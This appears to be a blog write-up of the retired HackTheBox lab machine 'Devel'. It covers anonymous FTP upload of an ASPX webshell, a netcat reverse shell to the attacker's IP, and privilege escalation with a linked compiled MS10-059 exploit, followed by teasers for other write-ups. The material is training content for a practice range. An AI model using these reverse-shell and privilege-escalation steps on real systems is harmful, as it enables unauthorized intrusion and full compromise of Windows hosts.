Skip to main content

HackTheBox - Retired - Devel - Updated

Hackthebox - Retired - Devel


Recon

I've been using Threader3000 for my recon scans lately. It's a threaded python scanner that suggests nmap scans based on the results of the initial first up/down scan.



Just 2 open ports


I like to convert the nmap xml to html to make it easy on the eyes.

xsltproc ./10.10.10.5.xml -o ../devel.htb.html





So this looks like a microsoft box with an FTP open on 21 to anonymous and IIS 7.5 on port 80


Let's start with port 80 and see what they are serving up.



Just the standard IIS parking page.


FTP (logged in as anonymous)


Looks like the www folder for the webserver.


So anonymous has write permissions to the FTP so we can put any file we want in there… so I uploaded a webshell, that is pre-rolled with kali.




Exploit



Here you can see cmdasp.aspx in the root of what looks like the webserver.


Let's see if we can browse to this now.



That was quick and easy.


I used the FTP to upload nc.exe to devel to see if we could get a better shell.


I found the files we uploaded just using dir, eventually I found them in 


C:\inetpub\wwwroot\


So then I setup a listener on my kali box


Nc -lnvp 5555


And in the command window on devel I put in


C:\inetpub\wwwroot\nc.exe 10.10.14.6 5555 -e "cmd.exe"

Then I checked back in on my listener and 



We do have a low level shell..


I used the FTP to upload winpeas.bat to devel to see if we could get some basic enumeration on the box.


I don't know what the intended path is to "Own" this box but there are sure a lot of patches it's missing.



I don't know about you but, I love brazillian food so that Chimichurri one catches my eye. It looks like there are several vulnerabilities we could use going forward, you might try some of the others and see where you get.


https://rapid7.com/db/vulnerabilities/WINDOWS-HOTFIX-MS10-059



It says it's a privilege escalation vulnerability. Which an authenticated user can use to escalate privileges to the system, sounds like it's exactly what we are looking for.


I pretty quickly googled for an exploit and found this compiled exploit where we only need to supply the IP address and port of our listener for a reverse shell.


https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri


I downloaded it and used the FTP to upload it to the C:\inetpub\wwwroot


Setup a new listener on my kali box


nc -lnvp 4455


And from my aspx shell ran this command.


C:\inetpub\wwwroot\Chimichurri.exe 10.10.14.6 4455




And just as advertised, we are "system" which means we have full access to everything about this computer.


Just a quick cd over to C:\users\administrator\desktop


And we can get the root flag.



I just realized that we didn't get the user flag, just a quick CD over to that folder.


This is redo of the first box I ever did on HackTheBox.eu  I can remember being blown away reading write ups on this box and how I could follow along and actually "Hack" a computer. I pleased to say I didn't need any write ups to follow on this box now, my skills are growing such that this box seemed pretty easy to me. If you are new to this too, keep going this might seem a bit hard and a bit like magic the first time you do it, you will get better and have a better understanding of what you are doing if you just keep at it..



Hack The Planet!


Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar...
Post a Comment
Read more

Hack The Box - Retired - Laboratory

HackTheBox - Laboratory - Retired Starting off with a quick scan using threader6000 /opt/threader3000/threader6000.py 10.10.10.216 Ports 22,80,443 came back. Run nmap against these ports. nmap -p22,80,443 -sV -sC -T4 -Pn -oN 10.10.10.216 10.10.10.216 nmap -p22,80,443 -sV -sC -Pn -T4 -oN 10.10.10.216 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 17:43 EDT Nmap scan report for laboratory.htb (10.10.10.216) Host is up (0.060s latency). PORT    STATE SERVICE  VERSION 22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA) |   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA) |_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519) 80/tcp  open  http     Apache httpd 2.4.41 |_...
Post a Comment
Read more

A collection of online Security CTF and Learning sites

 Hellbound Hackers    Embedded Security CTF Arizona Cyber Warfare Range Over The Wire - Bandit Pico CTF 2018 Hack The Box.eu Root Me: Challenges/Forensic RingZero CTF Vulnerable By Design - Vulnerable VMs Murder Mystery SQL Challenge Incident Response Challenge Authentication Lab Walkthroughs Defcon CTF Archives Matrix Holiday Hack Cyber Defenders | Blue Team and CTF Crypto Hack - learning Crypto Video Learning Zero to Hero Pentesting by The Cyber Mentor
Post a Comment
Read more